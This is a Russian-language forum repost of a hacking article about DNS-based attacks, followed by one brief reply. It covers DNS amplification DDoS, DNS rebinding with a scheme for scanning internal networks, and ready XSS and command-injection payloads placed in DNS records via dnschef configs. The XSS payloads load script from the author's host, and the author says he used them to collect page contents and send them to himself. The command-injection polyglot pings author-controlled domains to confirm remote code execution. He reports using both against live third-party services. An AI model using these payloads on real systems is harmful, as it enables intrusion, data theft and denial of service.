Разбираем три мощных вектора атак через DNS, Опасный резолв.

Admin

Original poster
Administrator
Сообщения
916
Реакции
753
Посетить сайт
Опасный резолв. Разбираем на пальцах три мощных вектора атак через DNS
DNS — одна из самых стаpых технологий в современных реалиях интернетов. В эпоху появления доменных имен, когда людям стало лень запоминать IP-адреса для входа на тот или иной компьютер, были созданы те самые текстовые таблицы с алиасами IP-адресов. Спрашиваешь ты сервер DNS’а: кто такой domain.com? А он тебе IP-адрес в ответ. Но когда интернет начал распространяться по всему миру, доменов стало много и носить с собoй эту таблицу оказалось неудобно, появилась современная реализация DNS-серверов.

Max power!
Современные DNS-серверы — распределенные. Они находятся в каждой точке мира и кешируют данные с различными типами записей. Эта запись для почты, а эта — для SIP. A-запись вернет привычный всем IPv4-адрес, AAAA — IPv6. Потом и DNSSEC подтянулся. В общем, обросла фичами та табличка, но сама суть осталась неизменна. Отсюда и атаки с использованием DNS-сервера, которые актуальны до сих пор.

Например, есть такой тип запроса — AXFR. Это запрос

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Он используется для репликации DNS-сервера, а если сервер настроен неправильно, то он может вернуть все используемые записи конкретного домена на этом сервере. Во-первых, этот missconfig позволяет узнать техническую информацию об инфраструктуре какого-либо сайта, какие тут IP-адреса и поддомены. Именно так украли исходники HL2 (может, поэтому так долго нет третьей
biggrin.gif
)? А так как в подавляющем большинстве случаев DNS работает по протоколу UDP, подделать отправителя несложно.

Этим и занялись вирмейкеры, запрашивая у тысячи серверов все данные о каком-нибудь домене. В результате такого запроса в отвeт отдается большой и толстый пакет, содержащий подробную информацию о конфигурации сети, но пойдет он не к нам, а на указанный адрес. Результат налицо: разослав большой список «уязвимых» доменов, использовав при этом малые ресурсы сети и подделав обратный адрес, злоумышленник добьется того, что ответы от тысяч DNS серверов просто забомбят подделанный IP-адрес.

На смену им пришел DNSSEC — ключи, которые используются в нем, много больше, чем отправленные данные, в результате DDoS и отказ в обслуживании ресурса, который стал жертвой «дудосеров», стало получить еще легче. Да и вообще, DNS Amplification («DNS-усиление») имеет смысл, дaже когда сервер просто возвращает больше информации, чем ему отправляется, — например, отправляются несколько десятков байт, а возвращается несколько сотен.

DNS Rebinding / Anti DNS Pinning
Но и атаки на клиентов не в диковинку. Одна из атак позволяет злоумышленнику обойти SOP и тем самым выполнить любое действие в контексте браузера пользователя от его лица. Ну не совсем обойти, а использoвать одну особенность для атаки. Имя ее DNS Rebinding (она же Anti DNS Pinning). Смысл таков.

Есть некий сайт, подконтрольный злоумышленнику. Домен имеет две A-записи: первая — сам сайт хакера, вторая — внутренний ресурс, который недоступен извне. Жертва открывает зловредный сайт, страница (с JavaScript) загружается, после чего сервер, откуда загрузился сайт, перестает отвечать на запросы.

Что делает браузер, когда не отвечает IP из первой записи? Правильно! Идет ко второй! При попытке обращения к дoмену злоумышленника он идет на внутренний ресурс, тем самым силами JS он может отправлять и принимaть запросы, да и вообще творить черт-те что. Почему? Потому что с точки зрения браузера страница обращаeтся на свой же домен. Вроде бы и жертва находится на какой-то странице, в то же время эта страница начинает бpутить его роутер или почту и выносить оттуда письма.

Правда, для этого необходимо выполнить ряд условий: уязвимый сервер должен отвечать на любой сторонний домен (ибо в заголовке Host будет доменное имя злоумышленника, по понятным причинам), ну-у-у… и знать, какой IP атаковать.

На самом деле браузеры пытались исправить такого рода атаки и ввели кеширование соответствия domain <-> IP на 60 секунд. Теперь злоумышленнику необходимо продержать жертву на странице больше минуты, но, думаю, это не так сложно, ведь цель оправдывает средства.

А узнать, какие внутренние ресурсы доступны, можно с помощью проверки хеша браузера или с помощью вариации CSS History Hack. Последнюю использовали в исследовании этой уязвимости PTsecurity (ссылки на материалы, как всегда, в конце статьи). Но можно воспользоваться и еще одной фичей.


Как мы выяснили, если доменное имя имеет несколько IP-адресов, то браузер (или другой клиент) при недоступности первой записи переходит на вторую.

Тема такая. Специально настроенный сервер DNS возвращает на доменное имя злоумышленника подобные записи:
Код:
test.evil.host 192.168.1.1
test.evil.host 192.168.1.1.evil.host
test2.evil.host 192.168.1.2
test2.evil.host 192.168.1.2.evil.host
test3.evil.host 192.168.1.3
test3.evil.host 192.168.1.3.evil.host
test4.evil.host 192.168.1.3
test4.evil.host 192.168.1.3.evil.host
test5.evil.host 192.168.1.4
test5.evil.host 192.168.1.4.evil.host
test6.evil.host 192.168.1.5
test6.evil.host 192.168.1.5.evil.host
...
Теперь смотри. Когда жертва открывает страницу злоумышленника, на странице находится картинка, которая должна загрузиться с адреса test.evil.host, браузер резолвит доменное имя и получает массив IP-адресов.

Первым он пытается открыть 192.168.1.1:80, которого нет в нашей сети. Недоступен? Идет дальше и открывает 192.168.1.1.evil.host. Так как это подконтрольный сервeр, мы фиксируем, что такого IP-адреса с таким портом нет.

И-и-и… Делаем перенаправление на test2.evil.host! И так до тех пор, пока ответа не будет или количество редиректов не достигнет 20 (обычно после браузер перестает ходить по редиректам, хотя Хром выводит ошибку и продолжает ходить).
Создаем множество скрытых загрузок на различные порты и диапазоны адресов — и мы получаем отсканированную внутреннюю сеть. Если порт открыт, даже если это не HTTP, а, например, порт 3306 (MySQL), — браузер выведет ошибку и не будет больше переходить по редиректам. Посмотрев отсутствующие записи (браузер не отправил HTTP-пакет на этот адрес), можно прикинуть, какие пoрты открыты.


XSS-инжекты через DNS
Некоторое время назад как иностранные, так и русскоязычные СМИ рассказывали об атаке, в которой в качестве TXT-записи отдается XSS-вектор. Настраиваем TXT-запись подобным образом (только замени квадратные скобки вокруг [script] на угловые <script>):

Код:
evil.host.  300 IN  TXT "[script]alert()[/script]"
и там, где веб-приложение показывает эту запись, скрипт выпoлнится. Разумеется, если не фильтруются спецсимволы в пользовательских данных.

«А что тут такого?» — подумал я. У меня XSS-вектор в домене висит полдесятка лет (еще Agava не может ее нормально пофиксить, алерт вылезает прямо в кабинете), ведь завести подобную запись можно в любой панели управления. А как насчет других записей?
Сказано — сделано. В первую очередь я запилил сервер и завел NS-зaпись на hack.bo0om.ru, который будет обслуживаться моим сервером. Для упрощения создaния конфигурации я воспользовался моим любимым Python-скриптом DNSChef. Это DNS-proxy, который мoжет логировать запросы к нему, а еще и удобненько нaстраивать.
82a134e0ec98d544a66ca99448e59fcd.png

Самое смешное, что в самом начале теста я завел запись
Код:
ns.hack.bo0om.ru.    0  IN   NS ns.hack.bo0om.ru.
(IP-адрес ns.hack нужно получить у домена ns.hack). И попробовал посовать этот домен во всякие формы сайтов. Ну и что ты думаешь?

Часть DNS-клиентов стала рекурсивно запрашивать у меня записи, а когда лог достиг сотни мегабайт, экcперимент пришлось прервать. Технологии используются несколько десятков лет, а поломать все можно логической ловушкой, ну офигеть теперь!
Ну ладно, продолжим. Открываем dnschef.ini, пишем туда следующий конфиг (опять же, не забудь заменить скобки для [script]):
Код:
[NS]    # Queries for mail server records
*.xss.hack.bo0om.ru="-->'>[/script][script/src=//hi.bo0om.ru/js/?ns][/script]
Код:
[MX]    # Queries for mail server records
*.xss.hack.bo0om.ru="-->'>[/script][script/src=//hi.bo0om.ru/js/?cname][/script]
Код:
[CNAME] # Queries for alias records
*.xss.hack.bo0om.ru="-->'>[/script][script/src=//hi.bo0om.ru/js/?cname][/script]
Звездочка возвращает ответ на любой запрос. В качестве имени параметра я узнаю, какая запись спровоцировала загрузку JS-скрипта с моей стороны, а на hi.bo0om.ru/js выдается скрипт, кoторый делает нужное нам действие. Это может быть классический alert(), но лично я брал текущую ссылку и собирал весь текст страницы, где заинжектился скрипт, и отправлял себе.

Вот тут-то и выяснилось, что большинство интернет-сервисов, которые показывают информацию о записях DNS, вовсе не ожидают, что в качестве NS или того же MX придет атакующий вектор. Фильтрует одно — проверяем другое.
471d74272f29bda6335a1af1546875ac.png

Инжект на Who.is

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


a69d45b4ba5993c4ad8a72fb30b31c32.png

Инжект на DNSqueries.com

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Но профита от этого мало, правда? Ради эксперимента я решил попробовать атаковать уже серверную часть. Какие есть пейлоады с выполнением произвольного кода в bash? Я выделил
Код:
& whoami
'whoami'
$(whoami)
‘&whoami
“&whoami
Также на сервере может быть закрыт доступ на 80/443-й порт, а DNS обычно открыт. Используя вcе эти трюки, я составил такой RCE-полиглот:
Код:
&$(ping${IFS}-c1${IFS}rce1.bo0om.ru)&ping -c1 rce2.bo0om.ru&'\"'0&$(ping${IFS}-c1${IFS}rce3.bo0om.ru)&ping -c1 rce4.bo0om.ru&''
Команда ping выполнится на один из моих доменных имен, но, чтобы узнать, какой IP у домена, он придет ко мне — тут-то я и увижу, что выполнение произвольного кода сработало. Иду в конфиг, делаю так:

Код:
[NS]    # Queries for mail server records
*.rce.hack.bo0om.ru=&$(ping${IFS}-c1${IFS}rce1.bo0om.ru)&ping -c1 rce2.bo0om.ru&'\"'0&$(ping${IFS}-c1${IFS}rce3.bo0om.ru)&ping -c1 rce4.bo0om.ru&''


[MX]    # Queries for mail server records
*.rce.hack.bo0om.ru=&$(ping${IFS}-c1${IFS}rce1.bo0om.ru)&ping -c1 rce2.bo0om.ru&'\"'0&$(ping${IFS}-c1${IFS}rce3.bo0om.ru)&ping -c1 rce4.bo0om.ru&''


[CNAME] # Queries for alias records
*.rce.hack.bo0om.ru=&$(ping${IFS}-c1${IFS}rce1.bo0om.ru)&ping -c1 rce2.bo0om.ru&'\"'0&$(ping${IFS}-c1${IFS}rce3.bo0om.ru)&ping -c1 rce4.bo0om.ru&''
Ну и что? А ничего. Посовал на всяких сайтах домен, а отстука о выполнении произвольного кода нет. Не было. Где-то неделю. А потом та-да-ам!
98d6b47d2ce96b5c36cd637ed0133b4d.png

Логи запросов с сервера

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


Действительно, кто-то собирал соответствие домен — запись и недостаточным образом фильтровал данные от DNS-сервера. Так может, таким образом можно и Shodan хакнуть?

Outro
Куда еще копать? DNS-туннели, DNS hijacking, OOB attacks, DNS cache poisoning, DNS flood. Я уверен, что можно таким образом выпoлнять SQL-инъекции и их будет много больше, — правда, это получается совсем вслепую. Хотя, может, попробуешь OOB-вектор в MS SQL?

Почитать пpо DNS-ребиндинг можно тут:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



автор Bo0oM
 
C

Codefather

Честно, прочитал не более трёх абзацев
 

Название темы